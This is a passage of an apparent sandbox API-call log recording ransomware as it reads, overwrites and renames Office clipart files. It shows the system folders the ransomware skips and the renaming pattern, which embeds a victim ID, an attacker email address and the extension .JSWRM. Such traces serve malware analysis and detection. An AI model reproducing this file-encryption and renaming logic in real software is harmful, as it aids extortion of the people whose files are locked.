lpWideCharStr=0x0) returned 24 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0078.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0078.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0078.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0078.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0078.720] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02158_.WMF", cAlternateFileName="")) returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2=".") returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="..") returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="...") returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="windows") returned -1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="recovery") returned -1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="perflogs") returned -1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="documents and settings") returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="system volume information") returned -1 [0078.720] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="msocache") returned -1 [0078.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0078.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02158_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02158_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02158_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0078.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0078.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02158_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02158_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02158_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0078.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0078.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0078.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.721] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1648) returned 1 [0078.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x670) returned 0x22d530 [0078.721] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0078.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.725] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0078.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0078.726] CloseHandle (hObject=0x314) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0078.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0078.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0078.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0078.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0078.727] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02161_.WMF", cAlternateFileName="")) returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2=".") returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="..") returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="...") returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="windows") returned -1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="recovery") returned -1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="perflogs") returned -1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="documents and settings") returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="system volume information") returned -1 [0078.727] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="msocache") returned -1 [0078.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02161_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02161_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02161_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0078.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02161_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02161_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02161_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0078.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.728] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3128) returned 1 [0078.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc30) returned 0x23fc98 [0078.728] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc30, lpOverlapped=0x0) returned 1 [0078.731] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.731] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc30, lpOverlapped=0x0) returned 1 [0078.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.731] CloseHandle (hObject=0x314) returned 1 [0078.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0078.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0078.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0078.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0078.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0078.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0078.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.732] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0078.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0078.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0078.732] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FINCL_01.MID", cAlternateFileName="")) returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2=".") returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="..") returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="...") returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="windows") returned -1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="recovery") returned -1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="perflogs") returned -1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="documents and settings") returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0078.732] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="system volume information") returned -1 [0078.733] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="msocache") returned -1 [0078.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FINCL_01.MID", lpUsedDefaultChar=0x0) returned 12 [0078.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0078.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FINCL_01.MID", lpUsedDefaultChar=0x0) returned 12 [0078.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0078.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0078.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0078.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.733] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12981) returned 1 [0078.733] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x32b0) returned 0x24d210 [0078.733] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x32b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x32b0, lpOverlapped=0x0) returned 1 [0078.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.736] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x32b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x32b0, lpOverlapped=0x0) returned 1 [0078.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.736] CloseHandle (hObject=0x314) returned 1 [0078.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0078.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0078.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0078.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0078.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0078.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0078.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0078.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.740] HeapFree (in: hHeap=0x1e0000, 